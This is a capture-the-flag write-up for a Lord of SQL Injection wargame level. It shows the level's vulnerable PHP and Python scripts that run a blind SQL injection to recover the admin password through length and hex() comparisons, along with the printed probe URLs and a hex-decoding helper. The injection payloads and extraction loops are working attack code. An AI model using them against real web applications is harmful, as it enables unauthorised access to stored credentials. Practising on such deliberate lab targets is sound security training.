Oh! JUN
[Lord Of SQL Injection] No. 19 (hard ★★★)
query : select id from prob_xavis where id='admin' and pw=''
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/regex|like/i', $_GET[pw])) exit("HeHe");
$query = "select id from prob_xavis where id='admin' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
$_GET[pw] = addslashes($_GET[pw]);
$query = "select pw from prob_xavis where id='admin' and pw='{$_GET[pw]}'";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("xavis");
highlight_file(__FILE__);
?>
Looking at the code alone it is no different from the previous problem, and the filtering is minimal, so it even looks easier (;;)
So I first tried the usual approach.
★ Finding the password length
import requests

url = "https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php"
cookie = dict(PHPSESSID="goh9k752dkkg54kddvje51kftj")

# Probe length(pw) one value at a time. The page prints "Hello admin" when the
# injected condition is true, so that string is the blind-injection oracle.
for i in range(1, 100):
    param = "?pw='or length(pw)in(%22" + str(i) + "%22)%23"
    len_result = url + param
    response = requests.get(len_result, cookies=cookie)
    print(len_result)
    if response.text.find("Hello admin") > 0:
        print("password :" + str(i))
        break
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(pw)in(%221%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(pw)in(%222%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(pw)in(%223%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(pw)in(%224%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(pw)in(%225%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(pw)in(%226%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(pw)in(%227%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(pw)in(%228%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(pw)in(%229%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(pw)in(%2210%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(pw)in(%2211%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(pw)in(%2212%22)%23
password :12
We can see that the password length comes out as 12.
★ Finding the password
import requests
import string

url = "https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php"
cookie = dict(PHPSESSID="goh9k752dkkg54kddvje51kftj")
asc = string.digits + string.ascii_letters
print(asc)
result = ""

# Extract pw one position at a time: right(left(pw, i), 1) is the i-th character.
# The candidate j is inserted unquoted, so the comparison is made against a
# number (or, for letters, a bare identifier) rather than a quoted string.
for i in range(1, 25):
    for j in asc:
        param = "?pw='or id='admin' and right(left(pw," + str(i) + "),1)=" + str(j) + "%23"
        print(param)
        res_url = url + param
        response = requests.get(res_url, cookies=cookie)
        if response.text.find("Hello admin") > 0:
            print(str(i) + "번째 패스워드 :" + j)
            result += j
            break
print("pw :" + result)
pw :000000000000000000000000
Every position of the password comes out as 0 (????)
★ The current approach
Searching around, the answer to this problem, unlike the earlier ones, is 'Unicode'.
So to compare it, the parameter has to be changed as follows.
param = "?pw='or id='admin' and right(left(hex(pw),"+str(i)+"),1)="+str(hex(ord(j)))+"%23"
digits, letters (string) → Unicode → hexadecimal | str(hex(ord(j))) |
Unicode → hexadecimal | hex(pw) |
● The previous approach
param = "?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,"+str(i)+"),1)%09in(%22"+str(j)+"%22)%23"
string | str(j) |
string | pw |
Password length
import requests

url = "https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php"
cookie = dict(PHPSESSID="goh9k752dkkg54kddvje51kftj")

# Same length probe as before, but against hex(pw) instead of pw, since the
# value is now compared in hexadecimal form; the URLs below are the probes sent.
for i in range(1, 100):
    param = "?pw='or length(hex(pw))in(%22" + str(i) + "%22)%23"
    len_result = url + param
    response = requests.get(len_result, cookies=cookie)
    print(len_result)
    if response.text.find("Hello admin") > 0:
        print("password :" + str(i))
        break
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%221%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%222%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%223%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%224%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%225%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%226%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%227%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%228%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%229%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%2210%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%2211%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%2212%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%2213%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%2214%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%2215%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%2216%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%2217%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%2218%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%2219%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%2220%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%2221%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%2222%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%2223%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%2224%22)%23
password :24
Finding the password
import requests
import string

url = "https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php"
cookie = dict(PHPSESSID="goh9k752dkkg54kddvje51kftj")
asc = string.digits + string.ascii_letters
print(asc)
result = ""        # hex digits of the character currently being assembled
total_hangul = ""  # decoded characters so far
pw = ""            # every recovered hex digit

# Extract hex(pw) one hex digit at a time. str(hex(ord(j))) turns the candidate
# into a 0x.. literal (e.g. '0' -> 0x30), which MySQL treats as the binary
# string "0", so it compares correctly against a digit taken from hex(pw).
for i in range(1, 25):
    for j in asc:
        param = "?pw='or id='admin' and right(left(hex(pw)," + str(i) + "),1)=" + str(hex(ord(j))) + "%23"
        print(param)
        res_url = url + param
        response = requests.get(res_url, cookies=cookie)
        if response.text.find("Hello admin") > 0:
            print(str(i) + "번째 패스워드 :" + j)
            result += j
            pw += j
            # Every 8 hex digits (4 bytes) form one code point: decode it.
            if i % 8 == 0:
                hangul = chr(int(result, 16))
                print(hangul)
                result = ""
                total_hangul += hangul
            break
print("pw :" + pw)
print(total_hangul)
pw :0000C6B00000C6550000AD73
우왕굳
if i % 8 == 0:
    hangul = chr(int(result, 16))
    print(hangul)
    result = ""
    total_hangul += hangul
break
The hex string is chopped into 8-digit chunks and each chunk converted to a character.
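As an added example (not the post's own code), here is the 8-digit decoding step above generalised to the three byte widths a MySQL hex(column) dump can reflect, together with the byte-vs-character arithmetic behind the two lengths found earlier (12 from length(pw), 24 from length(hex(pw))). The only input is the hex string the post recovered; the encoding names and function names are this example's own.

```python
"""Decode a hex(pw) dump as the write-up does (8 hex digits per character),
generalised to utf32 / utf16 / utf8 columns. Added example, not from the post."""
from __future__ import annotations

import binascii

# Widest code unit first, so a utf32 dump is not mis-read as utf16 with NULs.
CANDIDATE_ENCODINGS = ("utf-32-be", "utf-16-be", "utf-8")


def decode_hex_dump(hex_digits: str) -> tuple[str, str]:
    """Return (encoding, text) for a MySQL hex() dump.

    hex() emits two digits per stored byte, so the number of digits per
    character depends on the column charset (utf32 = 8, utf16 = 4, utf8mb4 =
    2..8). Accept the first candidate that decodes without error and yields
    only printable characters (a utf32 dump read as utf16 is full of U+0000).
    A pure-ASCII dump of even length stays ambiguous; this heuristic cannot fix that.
    """
    raw = binascii.unhexlify(hex_digits)
    for enc in CANDIDATE_ENCODINGS:
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        if text and all(ch.isprintable() for ch in text):
            return enc, text
    raise ValueError("no candidate encoding decodes the dump cleanly")


def chunks_of_eight(hex_digits: str) -> str:
    """The write-up's own rule: every 8 hex digits are one code point (utf32)."""
    if len(hex_digits) % 8:
        raise ValueError("a utf32 dump has a multiple of 8 hex digits")
    return "".join(chr(int(hex_digits[i:i + 8], 16))
                   for i in range(0, len(hex_digits), 8))


def explain_lengths(text: str, enc: str) -> dict[str, int]:
    """Why length(pw)=12 and length(hex(pw))=24 both describe a 3-character
    value: MySQL LENGTH() counts bytes (CHAR_LENGTH() counts characters) and
    hex() doubles the byte count."""
    nbytes = len(text.encode(enc))
    return {"chars": len(text), "length_pw": nbytes, "length_hex_pw": 2 * nbytes}


RECOVERED_HEX = "0000C6B00000C6550000AD73"  # the value the write-up recovered

if __name__ == "__main__":
    enc, text = decode_hex_dump(RECOVERED_HEX)
    print(enc, text)                          # utf-32-be 우왕굳
    print(chunks_of_eight(RECOVERED_HEX))     # 우왕굳
    print(explain_lengths(text, enc))         # 3 chars, 12 bytes, 24 hex digits
```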
query : select id from prob_xavis where id='admin' and pw='우왕굳'
Hello admin
XAVIS Clear!